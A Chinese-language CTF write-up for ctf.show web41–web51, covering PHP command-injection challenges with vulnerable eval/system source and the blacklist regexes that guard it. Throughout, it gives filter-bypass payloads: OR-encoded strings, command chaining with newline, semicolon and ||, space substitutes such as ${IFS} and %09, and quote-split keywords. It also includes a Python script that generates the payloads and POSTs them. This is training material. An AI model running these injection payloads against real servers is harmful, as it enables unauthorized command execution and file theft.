web41
这题卡了我好久,在此特别感谢傅师傅的指导
看题目源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date: 2020-09-05 20:31:22
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show
*/
if(isset($_POST['c'])){
$c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
eval("echo($c);");
}
}else{
highlight_file(__FILE__);
}
?>可以看到过滤了非常多的东西,但是没有过滤(,),以及|,于是使用或运算绕过
下面上脚本
import re
import sys
import urllib.parse
import requests
with open('web或运算绕过.txt','w') as a:
for i in range(126):
for j in range(126):
k = i|j
if k<=126 and k>=32:
if re.search(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-', chr(i)+chr(j), re.I) ==None:
b = chr(k)+' %'+'{0:02x}'.format(int(i))+' %'+'{0:02x}'.format(int(j))
a.write(b+'\n')
url = input("[+]请输入url:")
while 1:
function = input('[+]:输入你的function:')
begin ='("'
end = '"'
with open('web或运算绕过.txt','r') as a:
c = a.readlines()
for i in function:
for b in c:
# print(i)
# print(b[0])
if i==b[0]:
begin+=b[2:5]
end+=b[6:9]
break
end+="\")"
begin+='"'
param = begin+'|'+end
command = input("[+] 输入你的command:")
begin ='("'
end = '"'
with open('web或运算绕过.txt','r') as a:
c = a.readlines()
for i in command:
for b in c:
# print(i)
# print(b[0])
if i==b[0]:
begin+=b[2:5]
end+=b[6:9]
break
# print(begin)
# print(end)
end+="\")"
begin+='"'
param+= begin+'|'+end
# print(param)
data = {
'c':urllib.parse.unquote(param)
}
# print(data)
res = requests.post(url=url,data=data)
print(res.text)要点:1.可以使用(‘function’)(‘command’)在eval(“echo($c)”;);中输出命令
2.使用或运算可以绕过过滤的字符
3.带有回车的好像hackbar直接不行,要用其他办法,原因未知
web42
源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
$c=$_GET['c'];
system($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__);
}可以看到他把错误输出和标准输入都输出到黑洞里,所以看不到返回
解法一:
payload?c=cat flag.php%0a直接换行
解法二:
payload?c=cat flag.php;用分号隔开
web43
源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}发现ban掉了;
于是使用&&或者||,&&就是当第一个命令执行成功以后再执行第二个命令,
所以解法一:
payload?c=tac *%26%26 注:一定记得url编码以后
解法二:
payload ?c=tac * %0a
payload ?c=nl * %0a
web44
源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}和上面大同小异
web45
源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| /i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}过滤了空格
空格绕过小技巧 1、${IFS} 但不能写作 $IFS 2、$IFS$9 3 、%09 4、<
所以说两种解法大部分和上面一样
payload?c=tac%09*%0a
web46
源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}看到多过滤了数字
不影响
与上面一样
payload?c=nl<fla''g.php%0a
web47
源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}没啥变化,同上
web48-49
都一样
web50-51
源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}可以看到*和%09和%26都没了,但是可以用nl<命令和||来绕过,注:nl无法使用 *和?
于是payload?c=nl<fla''g.php%7C%7C
